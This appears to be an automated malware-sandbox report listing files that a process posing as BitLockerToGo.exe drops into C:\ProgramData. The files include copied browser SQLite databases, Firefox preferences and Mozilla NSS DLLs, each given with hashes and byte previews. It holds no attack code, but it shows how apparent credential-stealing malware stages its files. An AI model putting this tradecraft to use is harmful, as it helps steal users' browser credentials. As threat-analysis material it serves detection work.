                                                                                                                                                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\AKEGDH

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\AKEGDH-shm

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\BGDAAE

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):9976
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.499944288613473
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
                                                                                                                                                                                                                                                                                                                  MD5:42594FD09C4DF3B174CF5D59B1CAB13A
                                                                                                                                                                                                                                                                                                                  SHA1:1B78FEB748C36A592C468A76BB60E98187D7BE4A
                                                                                                                                                                                                                                                                                                                  SHA-256:F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
                                                                                                                                                                                                                                                                                                                  SHA-512:E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\DBKFHC

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\FBFCAK

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2650118817842442
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KrJ/2qOB1nxCkMTSAELyKOMq+8QTQKC+CVum9:K0q+n0JT9ELyKOMq+8Q7K
                                                                                                                                                                                                                                                                                                                  MD5:DF83F659F3720BBAFAC1A4B03AF9BD9E
                                                                                                                                                                                                                                                                                                                  SHA1:AF9009341AE5840DE26E744F35D3E77499CB2701
                                                                                                                                                                                                                                                                                                                  SHA-256:256E9903D62C39069C93AE6871D9BE84354D638E8835A1E8619C14FEF933F9E0
                                                                                                                                                                                                                                                                                                                  SHA-512:057A1C2CF2AE715641234D1B7BF7FDB35B144DE228301DDDA17070C8A1BEAB3CBB791A2F7271E5F5D12E513AD4346C6716EE41D62296B8B2F6B657D89F630899
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\HJJEGCAAE

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\IECGIEBAE

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\IEHIII

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.03708713717387235
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                                                                                                                                                                                                                                                                                                                  MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                                                                                                                                                                                                                                                                                                                  SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                                                                                                                                                                                                                                                                                                                  SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                                                                                                                                                                                                                                                                                                                  SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\IEHIII-shm

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\JECAEHJJJKJK\KFIJEG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1373607036346451
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                                                                                                                                                                                                                                                  MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                                                                                                                                                                                                                                                  SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                                                                                                                                                                                                                                                  SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                                                                                                                                                                                                                                                  SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):685392
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: E89hSGjVrv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: E89hSGjVrv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
